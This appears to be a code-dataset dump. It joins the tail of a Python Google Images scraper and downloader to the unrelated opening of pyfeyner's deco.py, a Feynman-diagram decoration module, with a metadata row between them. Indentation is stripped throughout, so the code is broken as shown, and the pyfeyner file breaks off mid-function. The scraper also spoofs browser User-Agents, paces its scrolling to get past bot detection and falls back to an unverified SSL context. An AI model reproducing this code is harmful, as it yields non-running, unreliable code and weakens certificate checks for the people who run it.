parser.add_argument('-is', '--save_source', help="creates a text file containing a list of downloaded images along with source page url", type=str, required=False)
args = parser.parse_args()
arguments = vars(args)
records = []
records.append(arguments)
return records
class googleimagesdownload:
def __init__(self):
pass
# Downloading entire Web Document (Raw Page Content)
def download_page(self,url):
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print("Could not open URL. Please check your internet connection and/or ssl settings \n"
"If you are using proxy, make sure your proxy settings is configured correctly")
sys.exit()
else: # If the Current Version of Python is 2.x
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers=headers)
try:
response = urllib2.urlopen(req)
except URLError: # Handling SSL certificate failed
context = ssl._create_unverified_context()
response = urlopen(req, context=context)
page = response.read()
return page
except:
print("Could not open URL. Please check your internet connection and/or ssl settings \n"
"If you are using proxy, make sure your proxy settings is configured correctly")
sys.exit()
return "Page Not found"
# Download Page for more than 100 images
def download_extended_page(self,url,chromedriver):
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
if sys.version_info[0] < 3:
reload(sys)
sys.setdefaultencoding('utf8')
options = webdriver.ChromeOptions()
options.add_argument('--no-sandbox')
options.add_argument("--headless")
try:
browser = webdriver.Chrome(chromedriver, chrome_options=options)
except Exception as e:
print("Looks like we cannot locate the path the 'chromedriver' (use the '--chromedriver' "
"argument to specify the path to the executable.) or google chrome browser is not "
"installed on your machine (exception: %s)" % e)
sys.exit()
browser.set_window_size(1024, 768)
# Open the link
browser.get(url)
time.sleep(1)
print("Getting you a lot of images. This may take a few moments...")
element = browser.find_element_by_tag_name("body")
# Scroll down
for i in range(30):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3)
try:
browser.find_element_by_id("smb").click()
for i in range(50):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
except:
for i in range(10):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
print("Reached end of Page.")
time.sleep(0.5)
source = browser.page_source #page source
#close the browser
browser.close()
return source
#Correcting the escape characters for python2
def replace_with_byte(self,match):
return chr(int(match.group(0)[1:], 8))
def repair(self,brokenjson):
invalid_escape = re.compile(r'\\[0-7]{1,3}') # up to 3 digits for byte values up to FF
return invalid_escape.sub(self.replace_with_byte, brokenjson)
# Finding 'Next Image' from the given raw page
def get_next_tab(self,s):
start_line = s.find('class="dtviD"')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_tabs"
return link,'',end_quote
else:
start_line = s.find('class="dtviD"')
start_content = s.find('href="', start_line + 1)
end_content = s.find('">', start_content + 1)
url_item = "https://www.google.com" + str(s[start_content + 6:end_content])
url_item = url_item.replace('&', '&')
start_line_2 = s.find('class="dtviD"')
s = s.replace('&', '&')
start_content_2 = s.find(':', start_line_2 + 1)
end_content_2 = s.find('&usg=', start_content_2 + 1)
url_item_name = str(s[start_content_2 + 1:end_content_2])
chars = url_item_name.find(',g_1:')
chars_end = url_item_name.find(":", chars + 6)
if chars_end == -1:
updated_item_name = (url_item_name[chars + 5:]).replace("+", " ")
else:
updated_item_name = (url_item_name[chars+5:chars_end]).replace("+", " ")
return url_item, updated_item_name, end_content
# Getting all links with the help of '_images_get_next_image'
def get_all_tabs(self,page):
tabs = {}
while True:
item,item_name,end_content = self.get_next_tab(page)
if item == "no_tabs":
break
else:
if len(item_name) > 100 or item_name == "background-color":
break
else:
tabs[item_name] = item # Append all the links in the list named 'Links'
time.sleep(0.1) # Timer could be used to slow down the request for image downloads
page = page[end_content:]
return tabs
#Format the object in readable format
def format_object(self,object):
formatted_object = {}
formatted_object['image_format'] = object['ity']
formatted_object['image_height'] = object['oh']
formatted_object['image_width'] = object['ow']
formatted_object['image_link'] = object['ou']
formatted_object['image_description'] = object['pt']
formatted_object['image_host'] = object['rh']
formatted_object['image_source'] = object['ru']
formatted_object['image_thumbnail_url'] = object['tu']
return formatted_object
#function to download single image
def single_image(self,image_url):
main_directory = "downloads"
extensions = (".jpg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico")
url = image_url
try:
os.makedirs(main_directory)
except OSError as e:
if e.errno != 17:
raise
pass
req = Request(url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req, None, 10)
data = response.read()
response.close()
image_name = str(url[(url.rfind('/')) + 1:])
if '?' in image_name:
image_name = image_name[:image_name.find('?')]
# if ".jpg" in image_name or ".gif" in image_name or ".png" in image_name or ".bmp" in image_name or ".svg" in image_name or ".webp" in image_name or ".ico" in image_name:
if any(map(lambda extension: extension in image_name, extensions)):
file_name = main_directory + "/" + image_name
else:
file_name = main_directory + "/" + image_name + ".jpg"
image_name = image_name + ".jpg"
try:
output_file = open(file_name, 'wb')
output_file.write(data)
output_file.close()
except IOError as e:
raise e
except OSError as e:
raise e
print("completed ====> " + image_name.encode('raw_unicode_escape').decode('utf-8'))
return
def similar_images(self,similar_images):
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
try:
searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req1 = urllib.request.Request(searchUrl, headers=headers)
resp1 = urllib.request.urlopen(req1)
content = str(resp1.read())
l1 = content.find('AMhZZ')
l2 = content.find('&', l1)
urll = content[l1:l2]
newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
req2 = urllib.request.Request(newurl, headers=headers)
resp2 = urllib.request.urlopen(req2)
l3 = content.find('/search?sa=X&q=')
l4 = content.find(';', l3 + 19)
urll2 = content[l3 + 19:l4]
return urll2
except:
return "Cloud not connect to Google Images endpoint"
else: # If the Current Version of Python is 2.x
try:
searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req1 = urllib2.Request(searchUrl, headers=headers)
resp1 = urllib2.urlopen(req1)
content = str(resp1.read())
l1 = content.find('AMhZZ')
l2 = content.find('&', l1)
urll = content[l1:l2]
newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
req2 = urllib2.Request(newurl, headers=headers)
resp2 = urllib2.urlopen(req2)
l3 = content.find('/search?sa=X&q=')
l4 = content.find(';', l3 + 19)
urll2 = content[l3 + 19:l4]
return(urll2)
except:
return "Cloud not connect to Google Images endpoint"
#Building URL parameters
def build_url_parameters(self,arguments):
if arguments['language']:
lang = "&lr="
lang_param = {"Arabic":"lang_ar","Chinese (Simplified)":"lang_zh-CN","Chinese (Traditional)":"lang_zh-TW","Czech":"lang_cs","Danish":"lang_da","Dutch":"lang_nl","English":"lang_en","Estonian":"lang_et","Finnish":"lang_fi","French":"lang_fr","German":"lang_de","Greek":"lang_el","Hebrew":"lang_iw ","Hungarian":"lang_hu","Icelandic":"lang_is","Italian":"lang_it","Japanese":"lang_ja","Korean":"lang_ko","Latvian":"lang_lv","Lithuanian":"lang_lt","Norwegian":"lang_no","Portuguese":"lang_pt","Polish":"lang_pl","Romanian":"lang_ro","Russian":"lang_ru","Spanish":"lang_es","Swedish":"lang_sv","Turkish":"lang_tr"}
lang_url = lang+lang_param[arguments['language']]
else:
lang_url = ''
if arguments['time_range']:
json_acceptable_string = arguments['time_range'].replace("'", "\"")
d = json.loads(json_acceptable_string)
time_range = ',cdr:1,cd_min:' + d['time_min'] + ',cd_max:' + d['time_max']
else:
time_range = ''
if arguments['exact_size']:
size_array = [x.strip() for x in arguments['exact_size'].split(',')]
exact_size = ",isz:ex,iszw:" + str(size_array[0]) + ",iszh:" + str(size_array[1])
else:
exact_size = ''
built_url = "&tbs="
counter = 0
params = {'color':[arguments['color'],{'red':'ic:specific,isc:red', 'orange':'ic:specific,isc:orange', 'yellow':'ic:specific,isc:yellow', 'green':'ic:specific,isc:green', 'teal':'ic:specific,isc:teel', 'blue':'ic:specific,isc:blue', 'purple':'ic:specific,isc:purple', 'pink':'ic:specific,isc:pink', 'white':'ic:specific,isc:white', 'gray':'ic:specific,isc:gray', 'black':'ic:specific,isc:black', 'brown':'ic:specific,isc:brown'}],
'color_type':[arguments['color_type'],{'full-color':'ic:color', 'black-and-white':'ic:gray','transparent':'ic:trans'}],
'usage_rights':[arguments['usage_rights'],{'labeled-for-reuse-with-modifications':'sur:fmc','labeled-for-reuse':'sur:fc','labeled-for-noncommercial-reuse-with-modification':'sur:fm','labeled-for-nocommercial-reuse':'sur:f'}],
'size':[arguments['size'],{'large':'isz:l','medium':'isz:m','icon':'isz:i','>400*300':'isz:lt,islt:qsvga','>640*480':'isz:lt,islt:vga','>800*600':'isz:lt,islt:svga','>1024*768':'visz:lt,islt:xga','>2MP':'isz:lt,islt:2mp','>4MP':'isz:lt,islt:4mp','>6MP':'isz:lt,islt:6mp','>8MP':'isz:lt,islt:8mp','>10MP':'isz:lt,islt:10mp','>12MP':'isz:lt,islt:12mp','>15MP':'isz:lt,islt:15mp','>20MP':'isz:lt,islt:20mp','>40MP':'isz:lt,islt:40mp','>70MP':'isz:lt,islt:70mp'}],
'type':[arguments['type'],{'face':'itp:face','photo':'itp:photo','clipart':'itp:clipart','line-drawing':'itp:lineart','animated':'itp:animated'}],
'time':[arguments['time'],{'past-24-hours':'qdr:d','past-7-days':'qdr:w','past-month':'qdr:m','past-year':'qdr:y'}],
'aspect_ratio':[arguments['aspect_ratio'],{'tall':'iar:t','square':'iar:s','wide':'iar:w','panoramic':'iar:xw'}],
'format':[arguments['format'],{'jpg':'ift:jpg','gif':'ift:gif','png':'ift:png','bmp':'ift:bmp','svg':'ift:svg','webp':'webp','ico':'ift:ico','raw':'ift:craw'}]}
for key, value in params.items():
if value[0] is not None:
ext_param = value[1][value[0]]
# counter will tell if it is first param added or not
if counter == 0:
# add it to the built url
built_url = built_url + ext_param
counter += 1
else:
built_url = built_url + ',' + ext_param
counter += 1
built_url = lang_url+built_url+exact_size+time_range
return built_url
#building main search URL
def build_search_url(self,search_term,params,url,similar_images,specific_site,safe_search):
#check safe_search
safe_search_string = "&safe=active"
# check the args and choose the URL
if url:
url = url
elif similar_images:
print(similar_images)
keywordem = self.similar_images(similar_images)
url = 'https://www.google.com/search?q=' + keywordem + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
elif specific_site:
url = 'https://www.google.com/search?q=' + quote(
search_term.encode('utf-8')) + '&as_sitesearch=' + specific_site + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
else:
url = 'https://www.google.com/search?q=' + quote(
search_term.encode('utf-8')) + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
#safe search check
if safe_search:
url = url + safe_search_string
return url
#measures the file size
def file_size(self,file_path):
if os.path.isfile(file_path):
file_info = os.stat(file_path)
size = file_info.st_size
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if size < 1024.0:
return "%3.1f %s" % (size, x)
size /= 1024.0
return size
#keywords from file
def keywords_from_file(self,file_name):
search_keyword = []
with codecs.open(file_name, 'r', encoding='utf-8-sig') as f:
if '.csv' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
search_keyword.append(line.replace('\n', '').replace('\r', ''))
elif '.txt' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
search_keyword.append(line.replace('\n', '').replace('\r', ''))
else:
print("Invalid file type: Valid file types are either .txt or .csv \n"
"exiting...")
sys.exit()
return search_keyword
# make directories
def create_directories(self,main_directory, dir_name,thumbnail,thumbnail_only):
dir_name_thumbnail = dir_name + " - thumbnail"
# make a search keyword directory
try:
if not os.path.exists(main_directory):
os.makedirs(main_directory)
time.sleep(0.2)
path = (dir_name)
sub_directory = os.path.join(main_directory, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
if thumbnail or thumbnail_only:
sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail)
if not os.path.exists(sub_directory_thumbnail):
os.makedirs(sub_directory_thumbnail)
else:
path = (dir_name)
sub_directory = os.path.join(main_directory, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
if thumbnail or thumbnail_only:
sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail)
if not os.path.exists(sub_directory_thumbnail):
os.makedirs(sub_directory_thumbnail)
except OSError as e:
if e.errno != 17:
raise
pass
return
# Download Image thumbnails
def download_image_thumbnail(self,image_url,main_directory,dir_name,return_image_name,print_urls,socket_timeout,print_size,no_download,save_source,img_src,ignore_urls):
if print_urls or no_download:
print("Image URL: " + image_url)
if no_download:
return "success","Printed url without downloading"
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if socket_timeout:
timeout = float(socket_timeout)
else:
timeout = 10
response = urlopen(req, None, timeout)
data = response.read()
response.close()
path = main_directory + "/" + dir_name + " - thumbnail" + "/" + return_image_name
try:
output_file = open(path, 'wb')
output_file.write(data)
output_file.close()
if save_source:
list_path = main_directory + "/" + save_source + ".txt"
list_file = open(list_path,'a')
list_file.write(path + '\t' + img_src + '\n')
list_file.close()
except OSError as e:
download_status = 'fail'
download_message = "OSError on an image...trying next one..." + " Error: " + str(e)
except IOError as e:
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
download_status = 'success'
download_message = "Completed Image Thumbnail ====> " + return_image_name
# image size parameter
if print_size:
print("Image Size: " + str(self.file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return download_status, download_message
# Download Images
def download_image(self,image_url,image_format,main_directory,dir_name,count,print_urls,socket_timeout,prefix,print_size,no_numbering,no_download,save_source,img_src,silent_mode,thumbnail_only,format,ignore_urls):
if not silent_mode:
if print_urls or no_download:
print("Image URL: " + image_url)
if ignore_urls:
if any(url in image_url for url in ignore_urls.split(',')):
return "fail", "Image ignored due to 'ignore url' parameter", None, image_url
if thumbnail_only:
return "success", "Skipping image download...", str(image_url[(image_url.rfind('/')) + 1:]), image_url
if no_download:
return "success","Printed url without downloading",None,image_url
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if socket_timeout:
timeout = float(socket_timeout)
else:
timeout = 10
response = urlopen(req, None, timeout)
data = response.read()
response.close()
extensions = [".jpg", ".jpeg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico"]
# keep everything after the last '/'
image_name = str(image_url[(image_url.rfind('/')) + 1:])
if format:
if not image_format or image_format != format:
download_status = 'fail'
download_message = "Wrong image format returned. Skipping..."
return_image_name = ''
absolute_path = ''
return download_status, download_message, return_image_name, absolute_path
if image_format == "" or not image_format or "." + image_format not in extensions:
download_status = 'fail'
download_message = "Invalid or missing image format. Skipping..."
return_image_name = ''
absolute_path = ''
return download_status, download_message, return_image_name, absolute_path
elif image_name.lower().find("." + image_format) < 0:
image_name = image_name + "." + image_format
else:
image_name = image_name[:image_name.lower().find("." + image_format) + (len(image_format) + 1)]
# prefix name in image
if prefix:
prefix = prefix + " "
else:
prefix = ''
if no_numbering:
path = main_directory + "/" + dir_name + "/" + prefix + image_name
else:
path = main_directory + "/" + dir_name + "/" + prefix + str(count) + "." + image_name
try:
output_file = open(path, 'wb')
output_file.write(data)
output_file.close()
if save_source:
list_path = main_directory + "/" + save_source + ".txt"
list_file = open(list_path,'a')
list_file.write(path + '\t' + img_src + '\n')
list_file.close()
absolute_path = os.path.abspath(path)
except OSError as e:
download_status = 'fail'
download_message = "OSError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
#return image name back to calling method to use it for thumbnail downloads
download_status = 'success'
download_message = "Completed Image ====> " + prefix + str(count) + "." + image_name
return_image_name = prefix + str(count) + "." + image_name
# image size parameter
if not silent_mode:
if print_size:
print("Image Size: " + str(self.file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except BadStatusLine as e:
download_status = 'fail'
download_message = "BadStatusLine on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except IncompleteRead as e:
download_status = 'fail'
download_message = "IncompleteReadError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
return download_status,download_message,return_image_name,absolute_path
# Finding 'Next Image' from the given raw page
def _get_next_item(self,s):
start_line = s.find('rg_meta notranslate')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('class="rg_meta notranslate">')
start_object = s.find('{', start_line + 1)
end_object = s.find('</div>', start_object + 1)
object_raw = str(s[start_object:end_object])
#remove escape characters based on python version
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: #python3
try:
object_decode = bytes(object_raw, "utf-8").decode("unicode_escape")
final_object = json.loads(object_decode)
except:
final_object = ""
else: #python2
try:
final_object = (json.loads(self.repair(object_raw)))
except:
final_object = ""
return final_object, end_object
# Getting all links with the help of '_images_get_next_image'
def _get_all_items(self,page,main_directory,dir_name,limit,arguments):
items = []
abs_path = []
errorCount = 0
i = 0
count = 1
while count < limit+1:
object, end_content = self._get_next_item(page)
if object == "no_links":
break
elif object == "":
page = page[end_content:]
elif arguments['offset'] and count < int(arguments['offset']):
count += 1
page = page[end_content:]
else:
#format the item for readability
object = self.format_object(object)
if arguments['metadata']:
if not arguments["silent_mode"]:
print("\nImage Metadata: " + str(object))
#download the images
download_status,download_message,return_image_name,absolute_path = self.download_image(object['image_link'],object['image_format'],main_directory,dir_name,count,arguments['print_urls'],arguments['socket_timeout'],arguments['prefix'],arguments['print_size'],arguments['no_numbering'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments["silent_mode"],arguments["thumbnail_only"],arguments['format'],arguments['ignore_urls'])
if not arguments["silent_mode"]:
print(download_message)
if download_status == "success":
# download image_thumbnails
if arguments['thumbnail'] or arguments["thumbnail_only"]:
download_status, download_message_thumbnail = self.download_image_thumbnail(object['image_thumbnail_url'],main_directory,dir_name,return_image_name,arguments['print_urls'],arguments['socket_timeout'],arguments['print_size'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments['ignore_urls'])
if not arguments["silent_mode"]:
print(download_message_thumbnail)
count += 1
object['image_filename'] = return_image_name
items.append(object) # Append all the links in the list named 'Links'
abs_path.append(absolute_path)
else:
errorCount += 1
#delay param
if arguments['delay']:
time.sleep(int(arguments['delay']))
page = page[end_content:]
i += 1
if count < limit:
print("\n\nUnfortunately all " + str(
limit) + " could not be downloaded because some images were not downloadable. " + str(
count-1) + " is all we got for this search filter!")
return items,errorCount,abs_path
# Bulk Download
def download(self,arguments):
paths_agg = {}
# for input coming from other python files
if __name__ != "__main__":
# if the calling file contains config_file param
if 'config_file' in arguments:
records = []
json_file = json.load(open(arguments['config_file']))
for record in range(0, len(json_file['Records'])):
arguments = {}
for i in args_list:
arguments[i] = None
for key, value in json_file['Records'][record].items():
arguments[key] = value
records.append(arguments)
total_errors = 0
for rec in records:
paths, errors = self.download_executor(rec)
for i in paths:
paths_agg[i] = paths[i]
if not arguments["silent_mode"]:
if arguments['print_paths']:
print(paths.encode('raw_unicode_escape').decode('utf-8'))
total_errors = total_errors + errors
return paths_agg,total_errors
# if the calling file contains params directly
else:
paths, errors = self.download_executor(arguments)
for i in paths:
paths_agg[i] = paths[i]
if not arguments["silent_mode"]:
if arguments['print_paths']:
print(paths.encode('raw_unicode_escape').decode('utf-8'))
return paths_agg, errors
# for input coming from CLI
else:
paths, errors = self.download_executor(arguments)
for i in paths:
paths_agg[i] = paths[i]
if not arguments["silent_mode"]:
if arguments['print_paths']:
print(paths.encode('raw_unicode_escape').decode('utf-8'))
return paths_agg, errors
def download_executor(self,arguments):
paths = {}
errorCount = None
for arg in args_list:
if arg not in arguments:
arguments[arg] = None
######Initialization and Validation of user arguments
if arguments['keywords']:
search_keyword = [str(item) for item in arguments['keywords'].split(',')]
if arguments['keywords_from_file']:
search_keyword = self.keywords_from_file(arguments['keywords_from_file'])
# both time and time range should not be allowed in the same query
if arguments['time'] and arguments['time_range']:
raise ValueError('Either time or time range should be used in a query. Both cannot be used at the same time.')
# both time and time range should not be allowed in the same query
if arguments['size'] and arguments['exact_size']:
raise ValueError('Either "size" or "exact_size" should be used in a query. Both cannot be used at the same time.')
# both image directory and no image directory should not be allowed in the same query
if arguments['image_directory'] and arguments['no_directory']:
raise ValueError('You can either specify image directory or specify no image directory, not both!')
# Additional words added to keywords
if arguments['suffix_keywords']:
suffix_keywords = [" " + str(sk) for sk in arguments['suffix_keywords'].split(',')]
else:
suffix_keywords = ['']
# Additional words added to keywords
if arguments['prefix_keywords']:
prefix_keywords = [str(sk) + " " for sk in arguments['prefix_keywords'].split(',')]
else:
prefix_keywords = ['']
# Setting limit on number of images to be downloaded
if arguments['limit']:
limit = int(arguments['limit'])
else:
limit = 100
if arguments['url']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
if arguments['similar_images']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
# If single_image or url argument not present then keywords is mandatory argument
if arguments['single_image'] is None and arguments['url'] is None and arguments['similar_images'] is None and \
arguments['keywords'] is None and arguments['keywords_from_file'] is None:
print('-------------------------------\n'
'Uh oh! Keywords is a required argument \n\n'
'Please refer to the documentation on guide to writing queries \n'
'https://github.com/hardikvasa/google-images-download#examples'
'\n\nexiting!\n'
'-------------------------------')
sys.exit()
# If this argument is present, set the custom output directory
if arguments['output_directory']:
main_directory = arguments['output_directory']
else:
main_directory = "downloads"
# Proxy settings
if arguments['proxy']:
os.environ["http_proxy"] = arguments['proxy']
os.environ["https_proxy"] = arguments['proxy']
######Initialization Complete
total_errors = 0
for pky in prefix_keywords: # 1.for every prefix keywords
for sky in suffix_keywords: # 2.for every suffix keywords
i = 0
while i < len(search_keyword): # 3.for every main keyword
iteration = "\n" + "Item no.: " + str(i + 1) + " -->" + " Item name = " + (pky) + (search_keyword[i]) + (sky)
if not arguments["silent_mode"]:
print(iteration.encode('raw_unicode_escape').decode('utf-8'))
print("Evaluating...")
else:
print("Downloading images for: " + (pky) + (search_keyword[i]) + (sky) + " ...")
search_term = pky + search_keyword[i] + sky
if arguments['image_directory']:
dir_name = arguments['image_directory']
elif arguments['no_directory']:
dir_name = ''
else:
dir_name = search_term + ('-' + arguments['color'] if arguments['color'] else '') #sub-directory
if not arguments["no_download"]:
self.create_directories(main_directory,dir_name,arguments['thumbnail'],arguments['thumbnail_only']) #create directories in OS
params = self.build_url_parameters(arguments) #building URL with params
url = self.build_search_url(search_term,params,arguments['url'],arguments['similar_images'],arguments['specific_site'],arguments['safe_search']) #building main search url
if limit < 101:
raw_html = self.download_page(url) # download page
else:
raw_html = self.download_extended_page(url,arguments['chromedriver'])
if not arguments["silent_mode"]:
if arguments['no_download']:
print("Getting URLs without downloading images...")
else:
print("Starting Download...")
items,errorCount,abs_path = self._get_all_items(raw_html,main_directory,dir_name,limit,arguments) #get all image items and download images
paths[pky + search_keyword[i] + sky] = abs_path
#dumps into a json file
if arguments['extract_metadata']:
try:
if not os.path.exists("logs"):
os.makedirs("logs")
except OSError as e:
print(e)
json_file = open("logs/"+search_keyword[i]+".json", "w")
json.dump(items, json_file, indent=4, sort_keys=True)
json_file.close()
#Related images
if arguments['related_images']:
print("\nGetting list of related keywords...this may take a few moments")
tabs = self.get_all_tabs(raw_html)
for key, value in tabs.items():
final_search_term = (search_term + " - " + key)
print("\nNow Downloading - " + final_search_term)
if limit < 101:
new_raw_html = self.download_page(value) # download page
else:
new_raw_html = self.download_extended_page(value,arguments['chromedriver'])
self.create_directories(main_directory, final_search_term,arguments['thumbnail'],arguments['thumbnail_only'])
self._get_all_items(new_raw_html, main_directory, search_term + " - " + key, limit,arguments)
i += 1
total_errors = total_errors + errorCount
if not arguments["silent_mode"]:
print("\nErrors: " + str(errorCount) + "\n")
return paths, total_errors
#------------- Main Program -------------#
def main():
records = user_input()
total_errors = 0
t0 = time.time() # start the timer
for arguments in records:
if arguments['single_image']: # Download Single Image using a URL
response = googleimagesdownload()
response.single_image(arguments['single_image'])
else: # or download multiple images based on keywords/keyphrase search
response = googleimagesdownload()
paths,errors = response.download(arguments) #wrapping response in a variable just for consistency
total_errors = total_errors + errors
t1 = time.time() # stop the timer
total_time = t1 - t0 # Calculating the total time required to crawl, find and download all the links of 60,000 images
if not arguments["silent_mode"]:
print("\nEverything downloaded!")
print("Total errors: " + str(total_errors))
print("Total time taken: " + str(total_time) + " Seconds")
if __name__ == "__main__":
main()
# In[ ]:
| mit | -2,625,954,641,360,469,500 | 50.941642 | 622 | 0.552625 | false |
itoijala/pyfeyner | pyfeyner/deco.py | 1 | 12057 | #
# pyfeyner - a simple Python interface for making Feynman diagrams.
# Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel
# Copyright (C) 2013 Ismo Toijala
#
# pyfeyner is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyfeyner is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with pyfeyner; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""A couple of classes for decorating diagram elements."""
import math
import pyx
from pyfeyner.diagrams import FeynDiagram
from pyfeyner.utils import Visible
from pyfeyner import config
class Arrow(pyx.deco.deco, pyx.attr.attr):
"""Arrow for Feynman diagram lines"""
def __init__(self, pos=0.5, size=6*pyx.unit.v_pt,
angle=45, constriction=0.8):
self.pos = pos
self.size = size
self.angle = angle
self.constriction = constriction
def decorate(self, dp, texrunner=pyx.text.defaulttexrunner):
"""Attach arrow to a path (usually a line)."""
dp.ensurenormpath()
constrictionlen = self.size * self.constriction * \
math.cos(self.angle * math.pi / 360.0)
arrowtopos = self.pos * dp.path.arclen() + 0.5 * self.size
arrowtopath = dp.path.split(arrowtopos)[0]
arrowpath = pyx.deco._arrowhead(arrowtopath, self.pos*dp.path.arclen(),
1, self.size, 45, True, constrictionlen)
dp.ornaments.fill(arrowpath)
return dp
class FreeArrow(Visible):
"""Arrow not attached to any line in a diagram."""
def __init__(self, length=0.5 * pyx.unit.v_cm, size=6 * pyx.unit.v_pt,
angle=45, constriction=0.8, pos=None, x=None, y=None,
direction=0):
self.x, self.y = 0, 0
if x is not None:
self.x = x
if y is not None:
self.y = y
if pos is not None:
self.x, self.y = pos.getXY()
self.direction = direction
self.length = length
self.size = size
self.angle = angle
self.constriction = constriction
def draw(self, canvas):
"""Draw this arrow on the supplied canvas."""
endx, endy = self.x - self.length * math.sin(self.direction * math.pi / 180.0), \
self.y - self.length * math.cos(self.direction * math.pi / 180.0)
linepath = pyx.deco.decoratedpath(pyx.path.path(pyx.path.moveto(endx, endy),
pyx.path.lineto(self.x, self.y)))
styles = [pyx.deco.earrow(size=self.size, angle=self.angle,
constriction=self.constriction)]
canvas.stroke(linepath.path, styles)
class ParallelArrow(Visible):
"""Arrow running parallel to a line, for momenta, helicities etc."""
def __init__(self, line, pos=0.5, displace=0.3, length=0.5 * pyx.unit.v_cm,
